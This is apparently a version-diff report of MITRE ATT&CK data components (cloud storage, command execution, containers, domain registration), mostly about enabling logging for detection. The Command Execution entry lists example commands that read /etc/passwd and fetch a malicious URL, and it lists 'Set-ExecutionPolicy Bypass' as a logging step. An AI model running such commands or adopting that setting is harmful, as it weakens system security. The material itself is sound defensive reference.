Enable Logging for Cloud Storage Services
- AWS S3: Enable AWS CloudTrail to log CreateBucket API actions.
- Azure Blob Storage: Enable Azure Monitor and Diagnostic Logs for storage account activity. Use Azure Event Grid to capture Create Container operations.
- Google Cloud Storage: Enable Data Access logs in Cloud Audit Logs to monitor storage.buckets.create API calls.
- OpenStack Swift: Configure Swift logging to capture PUT requests to new containers.
Centralized Logging and Analysis
- Forward logs to centralized platforms like Splunk or cloud-native SIEM solutions for correlation and analysis. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of cloud storage infrastructure (ex: AWS S3 DeleteBu | t | Cloud Storage Deletion refers to the removal or destruction |
| cket) | | of cloud storage infrastructure, such as buckets, containers |
| | | , or directories, within a cloud environment. Monitoring thi |
| | | s activity is critical to detecting potential unauthorized o |
| | | r malicious actions, such as data destruction by adversaries |
| | | or accidental deletions that may lead to data loss. Example |
| | | s: - AWS S3 Bucket Deletion: An AWS user deletes an S3 buc |
| | | ket using the `DeleteBucket` API call. - Azure Blob Storage |
| | | Container Deletion: A user deletes a container in Azure Blob |
| | | Storage using the `Delete Container` operation. - Google Cl |
| | | oud Storage Bucket Deletion: A Google Cloud user deletes a b |
| | | ucket using the `storage.buckets.delete` API. - OpenStack Sw |
| | | ift Container Deletion: A user deletes a container in OpenSt |
| | | ack Swift using the `DELETE` method. This data component ca |
| | | n be collected through the following measures: Enable Loggi |
| | | ng for Cloud Storage Services - AWS S3: Enable AWS CloudTra |
| | | il to log DeleteBucket API actions. - Azure Blob Storage: En |
| | | able Azure Monitor and Diagnostic Logs to capture Delete Con |
| | | tainer operations. Use Azure Event Grid to capture and trigg |
| | | er alerts for container deletion. - Google Cloud Storage: En |
| | | able Data Access logs in Cloud Audit Logs to monitor storage |
| | | .buckets.delete API calls. - OpenStack Swift: Configure Swif |
| | | t logging to capture DELETE requests for containers. Centra |
| | | lized Logging and Analysis - Use platforms like Splunk or n |
| | | ative SIEMs to forward and analyze logs for anomalies in clo |
| | | ud storage deletions. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:58.772Z |
| description | Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket) | Cloud Storage Deletion refers to the removal or destruction of cloud storage infrastructure, such as buckets, containers, or directories, within a cloud environment. Monitoring this activity is critical to detecting potential unauthorized or malicious actions, such as data destruction by adversaries or accidental deletions that may lead to data loss. Examples:
- AWS S3 Bucket Deletion: An AWS user deletes an S3 bucket using the `DeleteBucket` API call.
- Azure Blob Storage Container Deletion: A user deletes a container in Azure Blob Storage using the `Delete Container` operation.
- Google Cloud Storage Bucket Deletion: A Google Cloud user deletes a bucket using the `storage.buckets.delete` API.
- OpenStack Swift Container Deletion: A user deletes a container in OpenStack Swift using the `DELETE` method.
This data component can be collected through the following measures:
Enable Logging for Cloud Storage Services
- AWS S3: Enable AWS CloudTrail to log DeleteBucket API actions.
- Azure Blob Storage: Enable Azure Monitor and Diagnostic Logs to capture Delete Container operations. Use Azure Event Grid to capture and trigger alerts for container deletion.
- Google Cloud Storage: Enable Data Access logs in Cloud Audit Logs to monitor storage.buckets.delete API calls.
- OpenStack Swift: Configure Swift logging to capture DELETE requests for containers.
Centralized Logging and Analysis
- Use platforms like Splunk or native SIEMs to forward and analyze logs for anomalies in cloud storage deletions. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An extracted list of cloud storage infrastructure (ex: AWS S | t | Cloud Storage Enumeration involves retrieving a list of avai |
| 3 ListBuckets or ListObjects) | | lable cloud storage infrastructure, such as buckets, contain |
| | | ers, or objects, within a cloud environment. This activity m |
| | | ay be performed for legitimate administrative purposes or ma |
| | | licious reconnaissance by adversaries seeking to identify ac |
| | | cessible storage resources.Examples: - AWS S3 Bucket Enumer |
| | | ation: An AWS user lists all buckets using the `ListBuckets` |
| | | API call. - Azure Blob Storage Container Enumeration: A use |
| | | r retrieves a list of all containers within a storage accoun |
| | | t using the Azure Storage SDK or API. - Google Cloud Storage |
| | | Bucket Enumeration: A Google Cloud user lists all buckets w |
| | | ithin a project using the `storage.buckets.list` API. - Open |
| | | Stack Swift Container Enumeration: A user retrieves a list o |
| | | f containers in OpenStack Swift using the `GET` method on th |
| | | e storage endpoint. This data component can be collected th |
| | | rough the following measures: Enable Logging for Cloud Stor |
| | | age Enumeration - AWS S3: Enable AWS CloudTrail to capture |
| | | ListBuckets and ListObjects API calls. - Azure Blob Storage: |
| | | Enable Azure Monitor and Diagnostic Logs to capture enumera |
| | | tion operations like List Containers. Use Azure Event Grid t |
| | | o trigger alerts for container enumeration. - Google Cloud S |
| | | torage: Enable Audit Logs in Google Cloud to track storage.b |
| | | uckets.list API activity. - OpenStack Swift: Configure Swift |
| | | logging to capture GET requests for container enumeration. |
| | | Centralized Log Aggregation - Use platforms like Splunk or |
| | | native SIEM solutions to collect and analyze enumeration lo |
| | | gs. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:55.587Z |
| description | An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects) | Cloud Storage Enumeration involves retrieving a list of available cloud storage infrastructure, such as buckets, containers, or objects, within a cloud environment. This activity may be performed for legitimate administrative purposes or malicious reconnaissance by adversaries seeking to identify accessible storage resources.Examples:
- AWS S3 Bucket Enumeration: An AWS user lists all buckets using the `ListBuckets` API call.
- Azure Blob Storage Container Enumeration: A user retrieves a list of all containers within a storage account using the Azure Storage SDK or API.
- Google Cloud Storage Bucket Enumeration: A Google Cloud user lists all buckets within a project using the `storage.buckets.list` API.
- OpenStack Swift Container Enumeration: A user retrieves a list of containers in OpenStack Swift using the `GET` method on the storage endpoint.
This data component can be collected through the following measures:
Enable Logging for Cloud Storage Enumeration
- AWS S3: Enable AWS CloudTrail to capture ListBuckets and ListObjects API calls.
- Azure Blob Storage: Enable Azure Monitor and Diagnostic Logs to capture enumeration operations like List Containers. Use Azure Event Grid to trigger alerts for container enumeration.
- Google Cloud Storage: Enable Audit Logs in Google Cloud to track storage.buckets.list API activity.
- OpenStack Swift: Configure Swift logging to capture GET requests for container enumeration.
Centralized Log Aggregation
- Use platforms like Splunk or native SIEM solutions to collect and analyze enumeration logs.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about cloud storage infrastructure and activ | t | Cloud Storage Metadata provides contextual information about |
| ity around it such as name, size, or owner | | cloud storage infrastructure and its associated activity. T |
| | | his data may include attributes such as storage name, size, |
| | | owner, permissions, creation date, region, and activity meta |
| | | data. It is essential for monitoring, auditing, and identify |
| | | ing anomalies in cloud storage environments. Examples: - A |
| | | WS S3 Bucket Metadata: Metadata about an S3 bucket includes |
| | | the bucket name, region, creation date, owner, storage class |
| | | , and permissions. - Azure Blob Storage Metadata: Metadata f |
| | | or an Azure Blob container includes container name, access l |
| | | evel (e.g., private or public), size, and tags. - Google Clo |
| | | ud Storage Metadata: Metadata includes bucket name, storage |
| | | class, location, labels, lifecycle policies, and versioning |
| | | status. - OpenStack Swift Metadata: Metadata for a Swift con |
| | | tainer includes name, access level, quota, and custom attrib |
| | | utes. This data component can be collected through the foll |
| | | owing measures: Enable Logging for Metadata Collection - A |
| | | WS S3: Use AWS CloudTrail to log `GetBucketAcl`, `GetBucketP |
| | | olicy`, and `HeadBucket` API calls. - Azure Blob Storage: Us |
| | | e Azure Monitor to log container metadata retrieval and upda |
| | | tes. - Google Cloud Storage: Enable Google Cloud Audit Logs |
| | | to capture `storage.buckets.get` and `storage.buckets.update |
| | | `. - OpenStack Swift: Enable logging of `HEAD` or `GET` requ |
| | | ests to containers. Centralized Log Aggregation - Use a SI |
| | | EM solution (e.g., Splunk) to aggregate and analyze metadata |
| | | retrieval and modification logs. - Correlate metadata acces |
| | | s with user actions, IP addresses, and other contextual data |
| | | . API Polling - Use cloud SDKs or APIs to periodically que |
| | | ry metadata for analysis: - AWS CLI Example: `aws s3api |
| | | get-bucket-acl --bucket company-sensitive-data` - Azure |
| | | CLI Example: `az storage container show --name customer-reco |
| | | rds` - Google Cloud CLI Example: `gcloud storage buckets |
| | | describe user-uploads` |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:52.404Z |
| description | Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner | Cloud Storage Metadata provides contextual information about cloud storage infrastructure and its associated activity. This data may include attributes such as storage name, size, owner, permissions, creation date, region, and activity metadata. It is essential for monitoring, auditing, and identifying anomalies in cloud storage environments. Examples:
- AWS S3 Bucket Metadata: Metadata about an S3 bucket includes the bucket name, region, creation date, owner, storage class, and permissions.
- Azure Blob Storage Metadata: Metadata for an Azure Blob container includes container name, access level (e.g., private or public), size, and tags.
- Google Cloud Storage Metadata: Metadata includes bucket name, storage class, location, labels, lifecycle policies, and versioning status.
- OpenStack Swift Metadata: Metadata for a Swift container includes name, access level, quota, and custom attributes.
This data component can be collected through the following measures:
Enable Logging for Metadata Collection
- AWS S3: Use AWS CloudTrail to log `GetBucketAcl`, `GetBucketPolicy`, and `HeadBucket` API calls.
- Azure Blob Storage: Use Azure Monitor to log container metadata retrieval and updates.
- Google Cloud Storage: Enable Google Cloud Audit Logs to capture `storage.buckets.get` and `storage.buckets.update`.
- OpenStack Swift: Enable logging of `HEAD` or `GET` requests to containers.
Centralized Log Aggregation
- Use a SIEM solution (e.g., Splunk) to aggregate and analyze metadata retrieval and modification logs.
- Correlate metadata access with user actions, IP addresses, and other contextual data.
API Polling
- Use cloud SDKs or APIs to periodically query metadata for analysis:
- AWS CLI Example: `aws s3api get-bucket-acl --bucket company-sensitive-data`
- Azure CLI Example: `az storage container show --name customer-records`
- Google Cloud CLI Example: `gcloud storage buckets describe user-uploads` |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to cloud storage infrastructure, including its | t | Cloud Storage Modification involves tracking changes made to |
| settings and/or data (ex: AWS S3 PutObject or PutObjectAcl) | | cloud storage infrastructure, including updates to settings |
| | | , permissions, or stored data. Examples include modifying ob |
| | | ject access control lists (ACLs), uploading new objects, or |
| | | updating bucket policies. Examples: AWS S3: An object is u |
| | | ploaded or its ACL is modified. - Azure Blob Storage: A blob |
| | | 's metadata or permissions are updated. - Google Cloud Stora |
| | | ge: An object's lifecycle policy is updated, or a bucket pol |
| | | icy is changed. - OpenStack Swift: Modifications to containe |
| | | r settings or uploading of new objects. This data component |
| | | can be collected through the following measures: Enable Lo |
| | | gging - AWS S3: Enable AWS CloudTrail to log API events lik |
| | | e PutObject, PutObjectAcl, and PutBucketPolicy. - Azure Blob |
| | | Storage: Use Azure Monitor to log write and update operatio |
| | | ns. - Google Cloud Storage: Enable Google Cloud Audit Logs t |
| | | o track storage.objects.update and storage.buckets.update. - |
| | | OpenStack Swift: Enable logging for PUT and POST requests t |
| | | o track object uploads and container metadata updates. Use |
| | | Cloud Monitoring Tools - Integrate with tools like AWS Conf |
| | | ig, Azure Security Center, or Google Cloud Monitoring to det |
| | | ect configuration drift or unauthorized changes. Centralize |
| | | d Log Aggregation - Use a SIEM (e.g., Splunk) to aggregate |
| | | logs across multiple cloud providers for unified monitoring |
| | | and analysis. Periodic API Queries - AWS CLI Example: Quer |
| | | y recent modifications to bucket policies: `aws s3api get-bu |
| | | cket-policy --bucket sensitive-data` - Azure CLI Example: Li |
| | | st changes to a blob container: `az storage blob show --cont |
| | | ainer-name private-docs` - Google Cloud CLI Example: Check m |
| | | etadata updates: `gcloud storage objects describe gs://user- |
| | | uploads/document.txt` |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:45.928Z |
| description | Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl) | Cloud Storage Modification involves tracking changes made to cloud storage infrastructure, including updates to settings, permissions, or stored data. Examples include modifying object access control lists (ACLs), uploading new objects, or updating bucket policies. Examples:
AWS S3: An object is uploaded or its ACL is modified.
- Azure Blob Storage: A blob's metadata or permissions are updated.
- Google Cloud Storage: An object's lifecycle policy is updated, or a bucket policy is changed.
- OpenStack Swift: Modifications to container settings or uploading of new objects.
This data component can be collected through the following measures:
Enable Logging
- AWS S3: Enable AWS CloudTrail to log API events like PutObject, PutObjectAcl, and PutBucketPolicy.
- Azure Blob Storage: Use Azure Monitor to log write and update operations.
- Google Cloud Storage: Enable Google Cloud Audit Logs to track storage.objects.update and storage.buckets.update.
- OpenStack Swift: Enable logging for PUT and POST requests to track object uploads and container metadata updates.
Use Cloud Monitoring Tools
- Integrate with tools like AWS Config, Azure Security Center, or Google Cloud Monitoring to detect configuration drift or unauthorized changes.
Centralized Log Aggregation
- Use a SIEM (e.g., Splunk) to aggregate logs across multiple cloud providers for unified monitoring and analysis.
Periodic API Queries
- AWS CLI Example: Query recent modifications to bucket policies: `aws s3api get-bucket-policy --bucket sensitive-data`
- Azure CLI Example: List changes to a blob container: `az storage blob show --container-name private-docs`
- Google Cloud CLI Example: Check metadata updates: `gcloud storage objects describe gs://user-uploads/document.txt` |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Command: Command Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | The execution of a line of text, potentially with arguments, | t | Command Execution involves monitoring and capturing the exec |
| created from program code (e.g. a cmdlet executed via power | | ution of textual commands (including shell commands, cmdlets |
| shell.exe, interactive commands like >dir, shell executions, | | , and scripts) within an operating system or application. Th |
| etc. ) | | ese commands may include arguments or parameters and are typ |
| | | ically executed through interpreters such as `cmd.exe`, `bas |
| | | h`, `zsh`, `PowerShell`, or programmatic execution. Examples |
| | | : - Windows Command Prompt - dir – Lists directory con |
| | | tents. - net user – Queries or manipulates user accounts |
| | | . - tasklist – Lists running processes. - PowerShell |
| | | - Get-Process – Retrieves processes running on a system. |
| | | - Set-ExecutionPolicy – Changes PowerShell script executio |
| | | n policies. - Invoke-WebRequest – Downloads remote resou |
| | | rces. - Linux Shell - ls – Lists files in a directory. |
| | | - cat /etc/passwd – Reads the user accounts file. - c |
| | | url http://malicious-site.com – Retrieves content from a mal |
| | | icious URL. - Container Environments - docker exec – Exe |
| | | cutes a command inside a running container. - kubectl ex |
| | | ec – Runs commands in Kubernetes pods. - macOS Terminal |
| | | - open – Opens files or URLs. - dscl . -list /Users – Li |
| | | sts all users on the system. - osascript -e – Executes A |
| | | ppleScript commands. This data component can be collected t |
| | | hrough the following measures: Enable Command Logging - Wi |
| | | ndows: - Enable PowerShell logging: `Set-ExecutionPolicy |
| | | Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\M |
| | | icrosoft\Windows\PowerShell\ScriptBlockLogging" -Name Enable |
| | | ScriptBlockLogging -Value 1` - Enable Windows Event Logg |
| | | ing: - Event ID 4688: Tracks process creation, inclu |
| | | ding command-line arguments. - Event ID 4104: Logs P |
| | | owerShell script block execution. - Linux/macOS: - Enabl |
| | | e shell history logging in `.bashrc` or `.zshrc`: `export HI |
| | | STTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='histor |
| | | y -a; history -w'` - Use audit frameworks (e.g., `auditd |
| | | `) to log command executions. Example rule to log all `execv |
| | | e` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_ex |
| | | ec` - Containers: - Use runtime-specific tools like Dock |
| | | er’s --log-driver or Kubernetes Audit Logs to capture exec c |
| | | ommands. Integrate with Centralized Logging - Collect logs |
| | | using a SIEM (e.g., Splunk) or cloud-based log aggregation |
| | | tools like AWS CloudWatch or Azure Monitor. Example Splunk S |
| | | earch for Windows Event 4688: `index=windows EventID=4688 Co |
| | | mmandLine=*` Use Endpoint Detection and Response (EDR) Tool |
| | | s - Monitor command executions via EDR solutions Deploy S |
| | | ysmon for Advanced Logging (Windows) - Use Sysmon's Event I |
| | | D 1 to log process creation with command-line arguments |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:14:39.124Z | 2025-04-18T15:11:30.145Z |
| description | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) | Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples:
- Windows Command Prompt
- dir – Lists directory contents.
- net user – Queries or manipulates user accounts.
- tasklist – Lists running processes.
- PowerShell
- Get-Process – Retrieves processes running on a system.
- Set-ExecutionPolicy – Changes PowerShell script execution policies.
- Invoke-WebRequest – Downloads remote resources.
- Linux Shell
- ls – Lists files in a directory.
- cat /etc/passwd – Reads the user accounts file.
- curl http://malicious-site.com – Retrieves content from a malicious URL.
- Container Environments
- docker exec – Executes a command inside a running container.
- kubectl exec – Runs commands in Kubernetes pods.
- macOS Terminal
- open – Opens files or URLs.
- dscl . -list /Users – Lists all users on the system.
- osascript -e – Executes AppleScript commands.
This data component can be collected through the following measures:
Enable Command Logging
- Windows:
- Enable PowerShell logging: `Set-ExecutionPolicy Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1`
- Enable Windows Event Logging:
- Event ID 4688: Tracks process creation, including command-line arguments.
- Event ID 4104: Logs PowerShell script block execution.
- Linux/macOS:
- Enable shell history logging in `.bashrc` or `.zshrc`: `export HISTTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='history -a; history -w'`
- Use audit frameworks (e.g., `auditd`) to log command executions. Example rule to log all `execve` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_exec`
- Containers:
- Use runtime-specific tools like Docker’s --log-driver or Kubernetes Audit Logs to capture exec commands.
Integrate with Centralized Logging
- Collect logs using a SIEM (e.g., Splunk) or cloud-based log aggregation tools like AWS CloudWatch or Azure Monitor. Example Splunk Search for Windows Event 4688:
`index=windows EventID=4688 CommandLine=*`
Use Endpoint Detection and Response (EDR) Tools
- Monitor command executions via EDR solutions
Deploy Sysmon for Advanced Logging (Windows)
- Use Sysmon's Event ID 1 to log process creation with command-line arguments |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Container: Container Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new container (ex: docker create < | t | "Container Creation" data component captures details about t |
| container_name>) | | he initial construction of a container in a containerized en |
| | | vironment. This includes events where a new container is ins |
| | | tantiated, such as through Docker, Kubernetes, or other cont |
| | | ainer orchestration platforms. Monitoring these events helps |
| | | detect unauthorized or potentially malicious container crea |
| | | tion. Examples: - Docker Example: `docker create my-contain |
| | | er`, `docker run --name=my-container nginx:latest` - Kuberne |
| | | tes Example: `kubectl run my-pod --image=nginx`, `kubectl cr |
| | | eate deployment my-deployment --image=nginx` - Cloud Contain |
| | | er Services Example - AWS ECS: Task or service creation |
| | | (`RunTask` or `CreateService`). - Azure Container Instan |
| | | ces: Deployment of a container group. - Google Kubernete |
| | | s Engine (GKE): Creation of new pods via GCP APIs. This dat |
| | | a component can be collected through the following measures: |
| | | - Docker Audit Logging: Enable Docker daemon logging to ca |
| | | pture `create` commands. Configure the Docker daemon to use |
| | | a log driver such as `syslog` or `json-file`. - Kubernetes A |
| | | udit Logs: Enable Kubernetes API server audit logging: - Clo |
| | | ud Provider Logs - AWS CloudTrail: Enable logging for EC |
| | | S `RunTask` or `CreateService` events. - Azure Monitor: |
| | | Enable activity logging for container group creation. - |
| | | GCP Cloud Logging: Monitor API calls such as `container.proj |
| | | ects.zones.clusters.create`. - SIEM Integration: Use a SIEM |
| | | to collect logs from Docker, Kubernetes, or cloud platforms. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:30.196Z |
| description | Initial construction of a new container (ex: docker create ) | "Container Creation" data component captures details about the initial construction of a container in a containerized environment. This includes events where a new container is instantiated, such as through Docker, Kubernetes, or other container orchestration platforms. Monitoring these events helps detect unauthorized or potentially malicious container creation. Examples:
- Docker Example: `docker create my-container`, `docker run --name=my-container nginx:latest`
- Kubernetes Example: `kubectl run my-pod --image=nginx`, `kubectl create deployment my-deployment --image=nginx`
- Cloud Container Services Example
- AWS ECS: Task or service creation (`RunTask` or `CreateService`).
- Azure Container Instances: Deployment of a container group.
- Google Kubernetes Engine (GKE): Creation of new pods via GCP APIs.
This data component can be collected through the following measures:
- Docker Audit Logging: Enable Docker daemon logging to capture `create` commands. Configure the Docker daemon to use a log driver such as `syslog` or `json-file`.
- Kubernetes Audit Logs: Enable Kubernetes API server audit logging:
- Cloud Provider Logs
- AWS CloudTrail: Enable logging for ECS `RunTask` or `CreateService` events.
- Azure Monitor: Enable activity logging for container group creation.
- GCP Cloud Logging: Monitor API calls such as `container.projects.zones.clusters.create`.
- SIEM Integration: Use a SIEM to collect logs from Docker, Kubernetes, or cloud platforms. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Container: Container Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An extracted list of containers (ex: docker ps) | t | "Container Enumeration" data component captures events and a |
| | | ctions related to listing and identifying active or availabl |
| | | e containers within a containerized environment. This includ |
| | | es information about running, stopped, or configured contain |
| | | ers, such as their names, IDs, statuses, or associated image |
| | | s. Monitoring this activity is crucial for detecting unautho |
| | | rized discovery or reconnaissance efforts. Examples: - Doc |
| | | ker Example: `docker ps`, `docker ps -a` - Kubernetes Exampl |
| | | e: `kubectl get pods`, `kubectl get deployments` - Cloud Con |
| | | tainer Services Example - AWS ECS: API Call: ListTasks o |
| | | r ListContainers - Azure Kubernetes Service: API Call: L |
| | | ist pod or container instances. - Google Kubernetes Engi |
| | | ne (GKE): API Call: Retrieve deployments and their associate |
| | | d containers. This data component can be collected through |
| | | the following measures: - Docker Audit Logging: Enable Dock |
| | | er daemon logging to capture enumeration commands. Use tools |
| | | like auditd to monitor terminal activity involving docker p |
| | | s or similar commands. - Kubernetes Audit Logs: Enable Kuber |
| | | netes API server audit logging. Capture events where users q |
| | | uery resources such as pods, deployments, or services. - Clo |
| | | ud Provider Logs - AWS CloudTrail: Enable logging for AP |
| | | I calls like ListTasks or DescribeTasks. - Azure Monitor |
| | | : Enable activity logging to track container-related queries |
| | | . - GCP Cloud Logging: Track API events involving contai |
| | | ner enumerations or deployments. - SIEM Integration: Collect |
| | | logs from Docker, Kubernetes, and cloud services for centra |
| | | lized analysis. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:36.677Z |
| description | An extracted list of containers (ex: docker ps) | "Container Enumeration" data component captures events and actions related to listing and identifying active or available containers within a containerized environment. This includes information about running, stopped, or configured containers, such as their names, IDs, statuses, or associated images. Monitoring this activity is crucial for detecting unauthorized discovery or reconnaissance efforts. Examples:
- Docker Example: `docker ps`, `docker ps -a`
- Kubernetes Example: `kubectl get pods`, `kubectl get deployments`
- Cloud Container Services Example
- AWS ECS: API Call: ListTasks or ListContainers
- Azure Kubernetes Service: API Call: List pod or container instances.
- Google Kubernetes Engine (GKE): API Call: Retrieve deployments and their associated containers.
This data component can be collected through the following measures:
- Docker Audit Logging: Enable Docker daemon logging to capture enumeration commands. Use tools like auditd to monitor terminal activity involving docker ps or similar commands.
- Kubernetes Audit Logs: Enable Kubernetes API server audit logging. Capture events where users query resources such as pods, deployments, or services.
- Cloud Provider Logs
- AWS CloudTrail: Enable logging for API calls like ListTasks or DescribeTasks.
- Azure Monitor: Enable activity logging to track container-related queries.
- GCP Cloud Logging: Track API events involving container enumerations or deployments.
- SIEM Integration: Collect logs from Docker, Kubernetes, and cloud services for centralized analysis. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Container: Container Start
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Activation or invocation of a container (ex: docker start or | t | "Container Start" data component captures events related to |
| docker restart) | | the activation or invocation of a container within a contain |
| | | erized environment. This includes starting a previously stop |
| | | ped container, restarting an existing container, or initiali |
| | | zing a container for runtime. Monitoring these activities is |
| | | critical for identifying unauthorized or unexpected contain |
| | | er activations, which may indicate potential adversarial act |
| | | ivity or misconfigurations. Examples: - Docker Example: `d |
| | | ocker start <container_name>`, `docker restart <container_na |
| | | me>` - Kubernetes Example: Kubernetes automatically restarts |
| | | containers as part of pod lifecycle management (e.g., due t |
| | | o health checks or configuration changes). - Cloud-Native Ex |
| | | ample - AWS ECS: API Call: StartTask to activate a stopp |
| | | ed ECS task. - Azure Container Instances: Command to res |
| | | tart a container group instance. - GCP Kubernetes Engine |
| | | : Automatic restarts as part of node or pod management. Thi |
| | | s data component can be collected through the following meas |
| | | ures: - Docker Audit Logging: Enable Docker logging to capt |
| | | ure start and restart events. Use tools like auditd to monit |
| | | or terminal activity involving container lifecycle commands. |
| | | - Kubernetes Audit Logs: Enable Kubernetes API server audit |
| | | logging. - Cloud Provider Logs - AWS CloudTrail: Captur |
| | | e StartTask or related API calls for ECS. - Azure Monito |
| | | r: Track activity in container groups that indicate start or |
| | | restart events. - GCP Cloud Logging: Record logs relate |
| | | d to pod restarts or scaling events in Kubernetes Engine. - |
| | | SIEM Integration: Collect logs from Docker, Kubernetes, and |
| | | cloud services to correlate container start events. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:33.436Z |
| description | Activation or invocation of a container (ex: docker start or docker restart) | "Container Start" data component captures events related to the activation or invocation of a container within a containerized environment. This includes starting a previously stopped container, restarting an existing container, or initializing a container for runtime. Monitoring these activities is critical for identifying unauthorized or unexpected container activations, which may indicate potential adversarial activity or misconfigurations. Examples:
- Docker Example: `docker start `, `docker restart `
- Kubernetes Example: Kubernetes automatically restarts containers as part of pod lifecycle management (e.g., due to health checks or configuration changes).
- Cloud-Native Example
- AWS ECS: API Call: StartTask to activate a stopped ECS task.
- Azure Container Instances: Command to restart a container group instance.
- GCP Kubernetes Engine: Automatic restarts as part of node or pod management.
This data component can be collected through the following measures:
- Docker Audit Logging: Enable Docker logging to capture start and restart events. Use tools like auditd to monitor terminal activity involving container lifecycle commands.
- Kubernetes Audit Logs: Enable Kubernetes API server audit logging.
- Cloud Provider Logs
- AWS CloudTrail: Capture StartTask or related API calls for ECS.
- Azure Monitor: Track activity in container groups that indicate start or restart events.
- GCP Cloud Logging: Record logs related to pod restarts or scaling events in Kubernetes Engine.
- SIEM Integration: Collect logs from Docker, Kubernetes, and cloud services to correlate container start events. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Domain Name: Domain Registration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Information about domain name assignments and other domain m | t | "Domain Name: Domain Registration" data component captures i |
| etadata (ex: WHOIS) | | nformation about the assignment, ownership, and metadata of |
| | | domain names. This information is often sourced from registr |
| | | ies like WHOIS and includes details such as registrant names |
| | | , contact information, registration dates, expiration dates, |
| | | and registrar details. This data is invaluable for tracking |
| | | domain ownership, detecting malicious domain registrations, |
| | | and identifying trends in adversary behavior. Examples: - |
| | | Registrant Information: WHOIS lookup of example.com - Regi |
| | | stration and Expiration Dates: A domain registered a week be |
| | | fore being used in phishing attacks. - Domain Status: Status |
| | | codes like clientTransferProhibited or serverHold indicate |
| | | domain restrictions or potential hijacking activity. - Name |
| | | Server Information: Name servers point to a public DNS provi |
| | | der often associated with malicious campaigns. - Privacy Pro |
| | | tection: A domain uses WHOIS privacy protection to hide regi |
